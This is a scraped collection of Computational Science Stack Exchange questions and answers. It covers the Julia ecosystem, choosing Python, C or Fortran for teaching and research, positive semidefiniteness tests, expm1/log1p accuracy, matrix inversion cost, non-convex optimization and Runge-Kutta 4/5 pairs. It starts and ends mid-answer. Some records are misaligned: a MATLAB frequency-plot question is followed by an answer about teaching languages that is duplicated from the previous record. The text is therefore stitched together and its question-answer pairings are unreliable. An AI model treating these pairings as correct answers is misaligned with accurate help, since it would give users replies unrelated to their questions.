other goodies like adjoint sensitivity analysis , chemical reaction DSLs , matrix-free Newton-Krylov, and full (data transfer free) GPU compatibility, with training of neural differential equations , all with fantastic benchmark results (disclaimer: I am the lead developer). The thing that is a little mind-boggling about the matured Julia ecosystem is its composibility. Essentially, when someone builds a generic library function like those in DifferentialEquations.jl, you can use any AbstractArray/Number type to generate new code on the fly. So for example, there is a library for error propagation ( Measurements.jl ) and when you stick it in the ODE solver, it automatically compiles a new version of the ODE solver which does error propagation without parameter sampling . Because of this, you may not find some features documented because the code for the features generates itself, and so you need to think more about library composition. One of the ways where composition is most useful is in linear algebra. The ODE solvers for example allow you to specify jac_prototype , letting you give it the type for the Jacobian that will be used internally. Of course there's things in the LineraAlgebra standard library like Symmetric and Tridiagonal you can use here, but given the utility of composibility in type generic algorithms, people have by now gone and built entire array type libraries. BandedMatrices.jl and BlockBandedMatrices.jl are libraries which define (Block) banded matrix types which have fast lu overloads, making them a nice way to accelerate the solution of stiff MOL discretizations of systems of partial differential equations. PDMats.jl allows for the specification of positive-definite matrices. Elemental.jl allows you to define a distributed sparse Jacobian. CuArrays.jl defines arrays on the GPU. Etc. Then you have all of your number types. Unitful.jl does unit checking at compile time so it's an overhead-free units library. DoubleFloats.jl is a fast higher precision library, along with Quadmath.jl and ArbFloats.jl . ForwardDiff.jl is a library for forward-mode automatic differentiation which uses Dual number arithmetic. And I can keep going listing these out. And yes, you can throw them into sufficiently generic Julia libraries like DifferentialEquations.jl to compile a version specifically optimized for these number types. Even something like ApproxFun.jl which is functions as algebraic objects (like Chebfun) works with this generic system, allowing the specification of PDEs as ODEs on scalars in a function space. Given the advantages of composibility and the way that types can be use to generate new and efficient code on generic Julia functions, there has been a lot of work to get implementations of core scientific computing functionality into pure Julia. Optim.jl for nonlinear optimization, NLsolve.jl for solving nonlinear systems, IterativeSolvers.jl for iterative solvers of linear systems and eigensystems, BlackBoxOptim.jl for black-box optimization, etc. Even the neural network library Flux.jl just uses CuArrays.jl's automatic compilation of code to the GPU for its GPU capabilities. This composibility was the core of what created things like neural differential equations in DiffEqFlux.jl . Probabilistic programming languages like Turing.jl are also quite mature now and make use of the same underlying tooling. Since Julia's libraries are so fundamentally based on code generation tools, it should be no surprised that there's a lot of tooling around code generation. Julia's broadcast system generates fused kernels on the fly which are overloaded by array types to give a lot of the features mentioned above. CUDAnative.jl allows for compiling Julia code to GPU kernels. ModelingToolkit.jl automatically de-sugars ASTs into a symbolic system for transforming mathematical code. Cassette.jl lets you "overdub" someone else's existing function, using rules to change their function before compile time (for example: change all of their array allocations to static array allocations and move operations to the GPU). This is more advanced tooling (I don't expect everyone doing scientific computing to take direct control of the compiler), but this is how a lot of the next generation tooling is being built (or rather, how the features are writing themselves). As for parallelism, I've mentioned GPUs, and Julia has built-in multithreading and distributed computing . Julia's multithreading will very soon use a parallel-tasks runtime (PARTR) architecture which allows for automated scheduling of nested multithreading . If you want to use MPI, you can just use MPI.jl . And then of course, the easiest way to make use of it all is to just use an AbstractArray type setup to use the parallelism in its operations. Julia also has the basic underlying ecosystem you would expect of a general purpose language used for scientific applications. It has the Juno IDE with a built-in debugger with breakpoints , it has Plots.jl for making all sorts of plots. A lot of specific tools are nice as well, like Revise.jl automatically updates your functions/library when a file saves. You have your DataFrames.jl , statistics libraries , etc. One of the nicest libraries is actually Distributions.jl which lets you write algorithms generic to the distribution (for example: rand(dist) takes a random number of whatever distribution was passed in), and there's a whole load of univariate and multivariate distributions (and of course dispatch happens at compile time, making this all as fast as hardcoding a function specific to the distribution). There is a bunch of data handling tooling , web servers , etc. you name it. At this point it's mature enough that if there's a basic scientific thing and you'd expect for it to exist, you just Google it with .jl or Julia and it'll show up. Then there's a few things to keep in mind on the horizon. PackageCompiler is looking to build binaries from Julia libraries, and it already has some successes but needs more development. Makie.jl is a whole library for GPU-accelerated plotting with interactivity, and it still needs some more work but it's really looking to become the main plotting library in Julia. Zygote.jl is a source-to-source automatic differentiation library which doesn't have the performance issues of a tracing-based AD (Flux's Tracker, PyTorch, Jax), and that is looking to work on all pure Julia codes. Etc. In conclusion, you can find a lot of movement in a lot of places, but in most areas there is already a solid matured library. It's no longer at a place where you ask "will it be adopted?": Julia has been adopted by enough people (millions of downloads) that it has the momentum to stay around for good. It has a really nice community, so if you ever just want to shoot the breeze and talk about parallel computing or numerical differential equations, some of the best chat rooms for that are in the Julialang Slack . Whether it's a language you should learn is a personal question, and whether it's the right language for your project is a technical question, and those are different. But is it a language that has matured and has the backing of a large consistent group of developers? That seems to be an affirmative yes. | {
"source": [
"https://scicomp.stackexchange.com/questions/10922",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/3746/"
]
} |
11,006 | Going to teach students of undergraduate level a course titled Introduction to Computer Programming. I am confused a bit. In Computational Physics scientists use C/C++ or Python or Fortran,CUDA etc..... this is time to build their base. What should I use? I know you can learn new programming language anytime in your life but which is wiser choice for me to elaborate them all basic programming concepts and OOP concepts later on. | First, if your undergraduates are like ours and had no prior introduction to computers, expect to spend some time teaching them how to use basic stuff like using a proper editor (i.e., not MS Word), the command line, etc. I think the answer somewhat depends on where you set the focus of your course (or what you are required to teach). For example: How relevant are the internal workings of the computer? Do you need classes and other advanced OOP structures? Do you want to teach them how to produce efficient programs or are you happy if they produce working programs at all? Also, do not forget that you most probably will need capable tutors. But now something to advantages and disadvantages of the languages, I am familiar with. Note that this is mainly from my experience as a computational physicist and some of this may depend on the particular field, workgroup, university, etc. Python I generally recommend using Numpy from almost the very beginning and I am assuming it to be used in the following. Advantages: It’s easy to learn and so is reading other people’s code (e.g., your example code, but also the students’ code for the tutors). Input and output (which should not be the focus of your course) can be fully covered by print , Numpy’s savetxt and loadtxt , and maybe sys.argv . It can be introduced on the fly and it does not eat much programming time. You do not need to deal with or only need to deal little with such details as number representation, memory management, data types. Thus it’s fast to program and you can focus on the actual algorithms. It‘s not a compiled language. This has two advantages: Students do not need to deal with a compiler and students can test stuff directly in the console without having to compile, restart and rerun the program. Relatedly, debugging is easier. There are easy-to-use libraries for almost everything. You do not need to learn additional script languages like shell scripts, Make, Gnuplot and so on – all this can be done from Python. There are a lot of good tutorials (for free). Disadvantages: It’s not compiled. Therefore Python programs may be drastically slower than compiled programs in some cases relevant to computational physics. In other cases, however, libraries (especially Numpy) can yield a comparable performance. Another way, to get good performances with Python is to write the relevant code snippets in another language like C¹. Obviously you need to learn this language for this, but this can be done later and your time learning Python is not wasted. It’s more difficult to teach such details as number representation, memory management, data types and their pitfalls, since they are somewhat obfuscated. C/C++ Advantages: It is compiled and therefore it’s easier to produce efficient code. You are directly dealing with number representation, memory management, data types and thus it is more intuitive to teach these – your students will get closer to what is really happening in their computer. There are libraries for basically everything but understanding and using a library takes some work. There is a relevant amount of existing code in C/C++ and thus students need to learn the language if they want to work with this code. If you already know C/C++, you can learn Python (for example) very fast. Disadvantages: It is compiled and your students have to deal with the compiler, the preprocessor, headers and so on. You would be surprised how much students fail at this step, even at the end of the semester. It is slower too learn and it takes longer to produce working code. Dealing with marginal stuff such as input and output takes some time as well in teaching as in programming. In C++, there is an extra syntax for input and output. Compiler and operating-system dependencies. You have to deal with the C/C++ confusion. Reading the code of other’s especially in C++ can be quite difficult due to the vast amount of syntax features. The main advantages of C++ over C (Classes, templates) should not be relevant for your course and are only becoming relevant for larger projects. Therefore I would choose C of the two, since it is more concise. Others Some comments on the other languages: Fortran: This is still used by a lot of groups and there is a lot of legacy code, but you cannot get around dealing with the old standards and their huge limitations and pitfalls (a lot of people are still working with Fortran 77). Also, it will be much harder to find tutorials, help on the Internet and so on. Matlab/Mathematica: All the problems of proprietary software. Consider in particular that your students are likely to collaborate with people who do not have access to this software and the ensuing problems. Cuda: This is only relevant for certain problems, if performance matters. Also, after all I know, you do not want to learn programming this way. ¹ Which is the standard workflow at least in our group. | {
"source": [
"https://scicomp.stackexchange.com/questions/11006",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/7572/"
]
} |
11,017 | I'm trying to get a frequency plot, or PDF (probability density function) plot for my biometrics project in MATLAB.
I have two vectors genuine_scores and impostor_scores , and I need to have a graph like: x-axis : value of elements
y-axis : frequency of that value So the graph should look like this : I tried probplot() but it gives the cumulative distrubition function I also tried normpdf(); but it does not make sense to me. Because I'm not interested in a mean value. I just need how frequent each of the value appears in the vector(s). Thanks for any help ! | First, if your undergraduates are like ours and had no prior introduction to computers, expect to spend some time teaching them how to use basic stuff like using a proper editor (i.e., not MS Word), the command line, etc. I think the answer somewhat depends on where you set the focus of your course (or what you are required to teach). For example: How relevant are the internal workings of the computer? Do you need classes and other advanced OOP structures? Do you want to teach them how to produce efficient programs or are you happy if they produce working programs at all? Also, do not forget that you most probably will need capable tutors. But now something to advantages and disadvantages of the languages, I am familiar with. Note that this is mainly from my experience as a computational physicist and some of this may depend on the particular field, workgroup, university, etc. Python I generally recommend using Numpy from almost the very beginning and I am assuming it to be used in the following. Advantages: It’s easy to learn and so is reading other people’s code (e.g., your example code, but also the students’ code for the tutors). Input and output (which should not be the focus of your course) can be fully covered by print , Numpy’s savetxt and loadtxt , and maybe sys.argv . It can be introduced on the fly and it does not eat much programming time. You do not need to deal with or only need to deal little with such details as number representation, memory management, data types. Thus it’s fast to program and you can focus on the actual algorithms. It‘s not a compiled language. This has two advantages: Students do not need to deal with a compiler and students can test stuff directly in the console without having to compile, restart and rerun the program. Relatedly, debugging is easier. There are easy-to-use libraries for almost everything. You do not need to learn additional script languages like shell scripts, Make, Gnuplot and so on – all this can be done from Python. There are a lot of good tutorials (for free). Disadvantages: It’s not compiled. Therefore Python programs may be drastically slower than compiled programs in some cases relevant to computational physics. In other cases, however, libraries (especially Numpy) can yield a comparable performance. Another way, to get good performances with Python is to write the relevant code snippets in another language like C¹. Obviously you need to learn this language for this, but this can be done later and your time learning Python is not wasted. It’s more difficult to teach such details as number representation, memory management, data types and their pitfalls, since they are somewhat obfuscated. C/C++ Advantages: It is compiled and therefore it’s easier to produce efficient code. You are directly dealing with number representation, memory management, data types and thus it is more intuitive to teach these – your students will get closer to what is really happening in their computer. There are libraries for basically everything but understanding and using a library takes some work. There is a relevant amount of existing code in C/C++ and thus students need to learn the language if they want to work with this code. If you already know C/C++, you can learn Python (for example) very fast. Disadvantages: It is compiled and your students have to deal with the compiler, the preprocessor, headers and so on. You would be surprised how much students fail at this step, even at the end of the semester. It is slower too learn and it takes longer to produce working code. Dealing with marginal stuff such as input and output takes some time as well in teaching as in programming. In C++, there is an extra syntax for input and output. Compiler and operating-system dependencies. You have to deal with the C/C++ confusion. Reading the code of other’s especially in C++ can be quite difficult due to the vast amount of syntax features. The main advantages of C++ over C (Classes, templates) should not be relevant for your course and are only becoming relevant for larger projects. Therefore I would choose C of the two, since it is more concise. Others Some comments on the other languages: Fortran: This is still used by a lot of groups and there is a lot of legacy code, but you cannot get around dealing with the old standards and their huge limitations and pitfalls (a lot of people are still working with Fortran 77). Also, it will be much harder to find tutorials, help on the Internet and so on. Matlab/Mathematica: All the problems of proprietary software. Consider in particular that your students are likely to collaborate with people who do not have access to this software and the ensuing problems. Cuda: This is only relevant for certain problems, if performance matters. Also, after all I know, you do not want to learn programming this way. ¹ Which is the standard workflow at least in our group. | {
"source": [
"https://scicomp.stackexchange.com/questions/11017",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/7580/"
]
} |
11,514 | Which one is better: FORTRAN or Python? And I guess that in both cases you need Gnuplot, am I right? I'm working on a Windows machine at the moment. I'd like to use it to get numerical solutions for physics-problems, including Monte-Carlo simulations, numerical integration and differentiation, molecular dynamics, etc. I saw a course on computational physics which introduces both FORTRAN (77 I believe) and Python. I'm planning to start with one and then learn the other, but I don't know which transition might be the easiest. Also which compilers would you recommend? The basic question for me comes down to: which one is the easiest to learn, which one is the fastest, which one is most user-friendly and above all which one is most used (so a comparison of these 4)? And next to that, what are the most common (free or paid) compilers in use? I'm currently considering converting an old laptop (early Intel dual core) to Linux; hopefully that's fast enough. Thanks a lot for the answers so far! The answers which are in line with what I'm looking for are those of LKlevin and SAAD. I know the basics of C++, Maple and I master MATLAB and Mathematica9 almost completely if that's any help. | Ease of learning Python and Fortran are both relatively easy-to-learn languages. It's probably easier to find good Python learning materials than good Fortran learning materials because Python is used more widely, and Fortran is currently considered a "specialty" language for numerical computing. I believe the transition from Python to Fortran would be easier. Python is an interpreted language, so the number of steps it takes to get your first program running is smaller (open the interpreter, type print("Hello, world!") at the prompt) than it is for Fortran (write a "Hello world" program, compile, run). I also think that there are better materials to teach object-oriented style in Python than in Fortran, and there's more Python code available on GitHub than Fortran code. Getting up and running on Windows Installing Python should be less painful; there are Windows distributions available. I recommend using a scientific distribution like Anaconda or Enthought Canopy. There's not really a compiler, per se; the interpreter takes that role. You'll want to use a CPython-based interpreter, because there are more numerical libraries available and it interoperates nicely with C, C++, and Fortran. Other interpreter implementations include Jython and PyPy. On a Windows machine, installing a Fortran compiler is going to be annoying. Typical command-line compilers are programs like gfortran, ifort (from Intel; free for personal use, otherwise costs money), and pgfortran (from PGI; free trial versions, otherwise costs money). To install these compilers, you might need to install some sort of UNIX/POSIX-type compatibility layer, like Cygwin or MinGW. I found it a pain to work with, but some people like that workflow. You could also install a compiler with a GUI, like Visual Fortran (again, you'd have to pay for a license). Windows Subsystem for Linux (WSL) could also be used to install gfortran compiler in Windows. On Linux, it will be easier to install Python and compilers; I would still install Anaconda or Enthought Canopy as a Python distribution. Speed: a productivity vs. performance tradeoff In using Python (or MATLAB, Mathematica, Maple, or any interpreted language), you give up performance for productivity. Compared to Fortran (or C++, C, or any other compiled language), you will write fewer lines of code to accomplish the same task, which generally means it will take you less time to get a working solution. The effective performance penalty for using Python varies, and is mitigated by delegating computationally intensive tasks to compiled languages. MATLAB does something similar. When you do a matrix multiplication in MATLAB, it calls BLAS; the performance penalty is virtually zero, and you didn't have to write any Fortran, C, or C++ to get the high performance. A similar situation exists in Python. If you can use libraries (for example, NumPy, SciPy, petsc4py, dolfin from FEniCS, PyClaw), you can write all of your code in Python and get good performance (a penalty of maybe 10-40%) because all of the computationally intensive parts are calls to fast compiled language libraries. However, if you were to write everything in pure Python, the performance penalty would be a factor of 100-1000x. So if you wanted to use Python and had to include a custom, computationally intensive routine, you would be better off writing that part in a compiled language like C, C++, or Fortran, then wrapping it with a Python interface. There are libraries that facilitate this process (like Cython and f2py), and tutorials to help you; it is generally not onerous. Scope of use Python is used more widely overall as a general-purpose language. Fortran is largely limited to numerical and scientific computing, and is mainly competing with C and C++ for users in that domain. In computational science, Python typically doesn't compete directly with compiled languages due to the performance penalties I mentioned. You would use Python for cases where you want high productivity and performance is a secondary consideration, such as in prototyping numerically intensive algorithms, data processing, and visualization. You would use Fortran (or another compiled language) when you have a good idea of what your algorithm and application design should be, you're willing to spend more time writing and debugging your code, and performance is paramount. (For instance, performance is a limiting step in your simulation process, or it is a key deliverable in your research.) A common strategy is to mix Python and a compiled language (usually C or C++, but Fortran has been used also), and only use the compiled language for the most performance-sensitive parts of the code; the development cost is, of course, that it's harder to write and debug a program in two languages than a program in a single language. In terms of parallelism, the current MPI standard (MPI-3) has native Fortran and C bindings. The MPI-2 standard had native C++ bindings, but MPI-3 does not, and you would have to use the C bindings. Third-party MPI bindings exist, such as mpi4py. I've used mpi4py; it works well, and is straightforward to use. For large-scale parallelism (tens of thousands of cores), you'd probably want to use a compiled language because things like dynamically loading the Python modules will bite you in the ass at scale if you do it in a naïve way. There are ways to get around that bottleneck, as demonstrated by the PyClaw developers, but it's simpler to avoid it. Personal opinions I have roughly a decade of experience in Fortran 90/95, and I've also programmed in Fortran 2003. I have roughly five years of experience programming in Python. I use Python much more than I use Fortran because, frankly, I get more done in Python. The majority of the work I need to do does not require major supercomputing resources and is generally not worth re-developing in another language, so Python is just fine for solving ODEs and PDEs. If I need to use a compiled language, I will use C, C++, or Fortran, in that order. Most of the Fortran code I've seen has been ugly, mainly because most of the computational science community seems unaware of or averse to any best practices discovered by software engineers in the last 30 years. To wit: there is no good unit testing framework in Fortran. (The best I came across is FUnit, by NASA, and that's not maintained anymore.) There are a few good Python unit testing frameworks, good Python documentation generators, and generally many better examples of good programming practices. | {
"source": [
"https://scicomp.stackexchange.com/questions/11514",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4811/"
]
} |
12,979 | I have a list ${\cal L}$ of symmetric matrices that I need to check for positive semi-definiteness (i.e their eigenvalues are non-negative.) The comment above implies that one could do it by computing the respective eigenvalues and checking if they are non-negative (perhaps having to take care of rounding errors.) Computing the eigenvalues is quite expensive in my scenario but I have noticed that the library that I am using has quite a fast test for positive definiteness (that is, if the eigenvalues of a matrix are strictly positive.) Hence the idea would be, that given a matrix $B \in {\cal L}$, one tests if $B + \epsilon I$ is positive definite. If it is not then $B$ is not positive semi-definite, otherwise one can compute the eigenvalues of $B$ to make sure it is indeed positive semi-definite. My question now is: Is there a more direct and efficient way of testing whether a matrix
is positive semi-definite, provided that an efficient test for
positive definiteness is given? | What's your working definition of "positive semidefinite" or "positive definite"? In floating point arithmetic, you'll have to specify some kind of tolerance for this. You could define this in terms of the computed eigenvalues of the matrix. However, you should first notice that the computed eigenvalues of a matrix scale linearly with the matrix, so that for example, the matrix I get by multiplying $A$ by a factor of one million has its eigenvalues multiplied by a million. Is $\lambda=-1.0$ a negative eigenvalue? If all of the other eigenvalues of your matrix are positive and on the order of $10^{30}$, then $\lambda=-1.0$ is effectively 0 and shouldn't be treated as a negative eigenvalue. Thus it's important to take scaling into account. A reasonable approach is to compute the eigenvalues of your matrix, and declare that the matrix is numerically positive semidefinite if all eigenvalues are larger than $-\epsilon \left| \lambda_{\max} \right|$, where $ \lambda_{\max}$ is the largest eigenvalue. Unfortunately, computing all of the eigenvalues of a matrix is rather time consuming. Another commonly used approach is that a symmetric matrix is considered to be positive definite if the matrix has a Cholesky factorization in floating point arithmetic. Computing the Cholesky factorization is an order of magnitude faster than computing the eigenvalues. You can extend this to positive semidefiniteness by adding a small multiple of the identity to the matrix. Again, there are scaling issues. One fast approach is to do a symmetric scaling of the matrix so that the diagonal elements are 1.0 and add $\epsilon$ to the diagonal before computing the Cholesky factorization. You should be careful with this though, because there are some problems with the approach. For example, there are circumstances where the $A$ and $B$ are postive definite in the sense that they have floating point Cholesky factorizations, but $(A+B)/2$ does not have a Cholesky factorization. Thus the set of "floating point Cholesky factorizable positive definite matrices" isn't convex! | {
"source": [
"https://scicomp.stackexchange.com/questions/12979",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4582/"
]
} |
20,629 | I have a simple question that is really hard to Google (besides the canonical What Every Computer Scientist Should Know About Floating-Point Arithmetic paper). When should functions such as log1p or expm1 be used instead of log and exp ? When should they not be used? How do different implementations of those functions differ in terms of their usage? | We all know that \begin{equation}
\exp(x) = \sum_{n=0}^\infty \frac{x^n}{n!} = 1 + x + \frac12 x^2 + \dots
\end{equation} implies that for $|x| \ll 1$ , we have $\exp(x) \approx 1 + x$ . This means that if we have to evaluate in floating point $\exp(x) -1$ , for $|x| \ll 1$ catastrophic cancellation can occur. This can be easily demonstrated in python: >>> from math import (exp, expm1)
>>> x = 1e-8
>>> exp(x) - 1
9.99999993922529e-09
>>> expm1(x)
1.0000000050000001e-08
>>> x = 1e-22
>>> exp(x) - 1
0.0
>>> expm1(x)
1e-22 Exact values are \begin{align}
\exp(10^{-8}) -1 &= 0.000000010000000050000000166666667083333334166666668 \dots \\
\exp(10^{-22})-1 &= 0.000000000000000000000100000000000000000000005000000 \dots
\end{align} In general an "accurate" implementation of exp and expm1 should be correct to no more than 1ULP (i.e. one unit of the last place). However, since attaining this accuracy results in "slow" code, sometimes a fast, less accurate implementation is available. For example in CUDA we have expf and expm1f , where f stands for fast. According to the CUDA C programming guide, app. D the expf has an error of 2ULP. If you do not care about errors in the order of few ULPS, usually different implementations of the exponential function are equivalent, but beware that bugs may be hidden somewhere... (Remember the Pentium FDIV bug ?) So it is pretty clear that expm1 should be used to compute $\exp(x)-1$ for small $x$ . Using it for general $x$ is not harmful, since expm1 is expected to be accurate over its full range: >>> exp(200)-1 == exp(200) == expm1(200)
True (In the above example $1$ is well below 1ULP of $\exp(200)$ , so all three expression return exactly the same floating point number.) A similar discussion holds for the inverse functions log and log1p since $\log(1+x) \approx x$ for $|x| \ll 1$ . | {
"source": [
"https://scicomp.stackexchange.com/questions/20629",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/14933/"
]
} |
22,105 | I am solving differential equations that require to invert dense square matrices. This matrix inversion consumes the most of my computation time, so I was wondering if I am using the fastest algorithm available. My current choice is numpy.linalg.inv . From my numerics I see that it scales as $O(n^3)$ where n is the number of rows, so the method seems to be Gaussian elimination. According to Wikipedia , there are faster algorithms avaliable. Does anyone know if there is a library that implements these? I wonder, why isn't numpy using these faster algorithms? | (This is getting too long for comments...) I'll assume you actually need to compute an inverse in your algorithm. 1 First, it is important to note that these alternative algorithms are not actually claimed to be faster , just that they have better asymptotic complexity (meaning the required number of elementary operations grows more slowly). In fact, in practice these are actually (much) slower than the standard approach (for given $n$), for the following reasons: The $\mathcal{O}$-notation hides a constant in front of the power of $n$, which can be astronomically large -- so large that $C_1 n^3$ can be much smaller than $C_2 n^{2.x}$ for any $n$ that can be handled by any computer in the foreseeable future. (This is the case for the Coppersmith–Winograd algorithm, for example.) The complexity assumes that every (arithmetical) operation takes the same time -- but this is far from true in actual practice: Multiplying a bunch of numbers with the same number is much faster than multiplying the same amount of different numbers. This is due to the fact that the major bottle-neck in current computing is getting the data into cache, not the actual arithmetical operations on that data. So an algorithm which can be rearranged to have the first situation (called cache-aware ) will be much faster than one where this is not possible. (This is the case for the Strassen algorithm, for example.) Also, numerical stability is at least as important as performance; and here, again, the standard approach usually wins. For this reason, the standard high-performance libraries (BLAS/LAPACK, which Numpy calls when you ask it to compute an inverse) usually only implement this approach. Of course, there are Numpy implementations of, e.g., Strassen's algorithm out there, but an $\mathcal{O}(n^3)$ algorithm hand-tuned at assembly level will soundly beat an $\mathcal{O}(n^{2.x})$ algorithm written in a high-level language for any reasonable matrix size. 1 But I'd be amiss if I didn't point out that this is very rarely really necessary: anytime you need to compute a product $A^{-1}b$, you should instead solve the linear system $Ax=b$ (e.g., using numpy.linalg.solve ) and use $x$ instead -- this is much more stable, and can be done (depending on the structure of the matrix $A$) much faster. If you need to use $A^{-1}$ multiple times, you can precompute a factorization of $A$ (which is usually the most expensive part of the solve) and reuse that later. | {
"source": [
"https://scicomp.stackexchange.com/questions/22105",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/8329/"
]
} |
23,948 | I was very surprised when I started to read something about non-convex optimization in general and I saw statements like this: Many practical problems of importance are non-convex, and most
non-convex problems are hard (if not impossible) to solve exactly in a
reasonable time. ( source ) or In general it is NP-hard to find a local minimum and many algorithms may get stuck at a saddle point. ( source ) I'm doing kind of non-convex optimization every day - namely relaxation of molecular geometry. I never considered it something tricky, slow and liable to get stuck. In this context, we have clearly many-dimensional non-convex surfaces ( >1000 degrees of freedom ). We use mostly first-order techniques derived from steepest descent and dynamical quenching such as FIRE , which converge in few hundred steps to a local minimum (less than number of DOFs). I expect that with the addition of stochastic noise it must be robust as hell. (Global optimization is a different story) I somehow cannot imagine how the potential energy surface should look like, to make these optimization methods stuck or slowly convergent. E.g. very pathological PES (but not due to non-convexity) is this spiral , yet it is not such a big problem. Can you give illustrative example of pathological non-convex PES? So I don't want to argue with the quotes above. Rather, I have feeling that I'm missing something here. Perhaps the context. | The misunderstanding lies in what constitutes "solving" an optimization problem, e.g. $\arg\min f(x)$. For mathematicians, the problem is only considered "solved" once we have: A candidate solution: A particular choice of the decision variable $x^\star$ and its corresponding objective value $f(x^\star)$, AND A proof of optimality: A mathematical proof that the choice of $x^\star$ is globally optimal, i.e. that $f(x) \ge f(x^\star)$ holds for every choice of $x$. When $f$ is convex, both ingredients are readily obtained. Gradient descent locates a candidate solution $x^\star$ that makes the gradient vanish $\nabla f(x^\star)=0$. The proof of optimality follows from a simple fact taught in MATH101 that, if $f$ is convex, and its gradient $\nabla f$ vanishes at $x^\star$, then $x^\star$ is a global solution. When $f$ is nonconvex, a candidate solution may still be easy to find, but the proof of optimality becomes extremely difficult. For example, we may run gradient descent and find a point $\nabla f(x^\star)=0$. But when $f$ is nonconvex, the condition $\nabla f(x)=0$ is necessary but no longer sufficient for global optimality. Indeed, it is not even sufficient for local optimality, i.e. we cannot even guarantee that $x^\star$ is a local minimum based on its gradient information alone. One approach is to enumerate all the points satisfying $\nabla f(x)=0$, and this can be a formidable task even over just one or two dimensions. When mathematicians say that most problems are impossible to solve, they are really saying that the proof of (even local) optimality is impossible to construct . But in the real world, we are often only interested in computing a "good-enough" solution, and this can be found in an endless number of ways. For many highly nonconvex problems, our intuition tells us that the "good-enough" solutions are actually globally optimal, even if we are completely unable to prove it! | {
"source": [
"https://scicomp.stackexchange.com/questions/23948",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4696/"
]
} |
24,998 | I simply want to know whether the Dormand-Prince Numerical Method or the Cash-Karp Numerical Method is more accurate. | Since I just finished optimizing a lot of them in software, DifferentialEquations.jl , I decided to just lay out a comparison of the main Order 4/5 methods. The Fehlberg method was left out because it's commonly known to be less efficient than the DP5 method. Backstories Dormand-Prince 4/5 The Dormand-Prince method was developed to be accurate as a 4/5 pair with local extrapolation usage (i.e. step with the order 5 pair. This is because it was designed to be close to optimal (i.e. minimal) principle truncation error coefficient (under the restraint of also having the minimal number of steps to achieve order 5). It has an order 4 interpolation which is free but needs extra steps for an order 5 interpolation. Cash-Karp 4/5 The Cash-Karp method was developed to satisfy different constraints, namely to deal with non-smooth problems better. They chose the $c_i$ , the percentage of the timestep in the $i$ th step (i.e. $t+c_i \Delta t$ is the time the $i$ th step is calculated at) to be as uniform as possible, yet still achieve order 5. Then it also was derived to have embedded 1st, 2nd, 3rd, and 4th order methods with this uniformity of the $c_i$ . They are spaced in such a manner that you can find out where a stiff part starts by which difference is large. Moreover, note that the more stiff the equation, the worse a higher order method does (because it needs bounds on higher derivatives). So they develop a strategy that uses the 5 embedded methods to "quit early": i.e. if you detect stiffness, stop at stage $i<6$ to decrease the number of function calls and save time. So in the end, this "pair" was developed with a lot of other constraints in mind, and so there's no reason to expect it would be "more accurate", at least as a 4/5 pair. If you add all of this other machinery then, on (semi-)stiff problems, it will be more accurate (but in that case you may want to use a different method like a W-Rosenbrock method). This is one reason why this pair hasn't become standard over the DP5 pair, but it still can be useful (maybe it would be good for a hybrid method that switches to a stiff solver when stiffness is encountered?). Bogacki & Shampine 4/5 To round out the answer, let's discuss the Bogacki & Shampine pair that was mentioned in the comment. The BS5 method drops the constraint of "using the least function calls" (it uses 8 instead of 6) in order to do 2 things: Get really low principle truncation error coefficients. Produce an order 5 interpolation with lower error coefficients. These coefficients are so low that for many problems with tolerances that users likely use, it measures as though it's 6th order. Their paper shows that for cheap function calls, this can be more efficient than DP5 by about the same amount as DP5 was over RKF5 (the Fehlberg method). You might put two-and-two together and see: wait a second, Shampine is the same person who developed the MATLAB ODE suite, this was after the BS5 pair paper was published, why doesn't MATLAB's ode45 use the BS5 pair? One reason is, it was mostly done before the BS5 pair was released. The other reason is that the ode45 function was developed to minimize time. While the BS5 pair is more efficient (i.e. gets lower accuracy), the purpose of ode45 is to have a good enough error to make a good enough plot. This means that, in order to deal with the large steps, it also produces two extra interpolated solutions between every step. For the DP5 method, there is a "free" order 4 interpolation, and so this is much faster than using BS5. Since it is also "accurate enough" at moderate tolerances, this method is set as the standard because it gives a better standard user experience than BS5 when doing interactive computing (so this choice was context-specific). Tsitouras 4/5 Here's one fewer people know about. It's derived in this paper . It's derived using fewer assumptions than the DP5 method and tries to get a pair with lower principle truncation error coefficients. In its tests, it states that it achieves this. It also has a free order 4 interpolation like the DP5 method. Numerical tests I wrote the numerical package DifferentialEquations.jl to be a pretty comprehensive set of solvers for Julia. Along the warpath, I implemented over 100 Runge-Kutta methods, and hand-optimized plenty. Three of the hand-optimized integrators are the DP5, BS5, and Tsit5 methods (I did not do CK5 because, as noted in the backstory, its main case is for problems that are kind of stiff. I think the better way to handle them is to use DP5/BS5 and switch to stiff solvers as necessary in a manner like LSODE, but that's a story for a different time) (one way to see they are close to optimal is that these methods are faster than the Hairer dopri5 implementations, so they are at least decent implementations). Tests between a lot of Runge-Kutta methods on nonstiff equations can be found on this benchmarks page . I am adding more as I go along, but you can see from the linear ODE and the Three-Body problem work precision diagrams, I measure the DP5 and Tsit5 methods to have almost identical efficiency, beating out the BS5 method in the linear ODE, while it's DP5 and BS5 that are almost identical on the Three-Body problem with Tsit5 behind. From this information, at least for now, I have settled on the DP5 method as the default, matching previous recommendations. That may change with future tests (or you could add benchmarks! Feel free to contribute, or Star the repo to give this effort more support). Conclusion In conclusion, the Order 5 pairs go like this: The Dormand-Prince 4/5 pair is a good go-to pair since it's well-optimized in terms of principle truncation error coefficient and has a cheap order 4 interpolation, which makes it fast for producing decent plots. The Cash-Karp pair has more constraints on it to better handle stiff equations. However, to get the full benefit you'll want to use the full algorithm with the 5 embedded methods. Bogacki & Shampine Order 5 method may be the most efficient in terms of producing error per function calls (it has a double error estimator, so in harder problems, it probably does better), but that allows it to take larger timesteps. However, if you just want to produce a smooth plot, you then have to counter-act this method: use a lower tolerance (so it will take longer than DP5 but with less error) or use more interpolated steps. In the end, this meant that it might not be better for interactive applications, although it might be better for some scientific computing applications. The Tsitouras 4/5. Was developed fairly recently (2011) to beat out the DP5 in a head-to-head comparison. My tests don't give me a reason to believe that it's so much better than DP5 that it should now be considered the new standard method, but future tests may begin to side in its favor. Edit I did improve the Tsit5 implementation. It now does better than DP5 on most tests, both the DifferentialEquations.jl and the 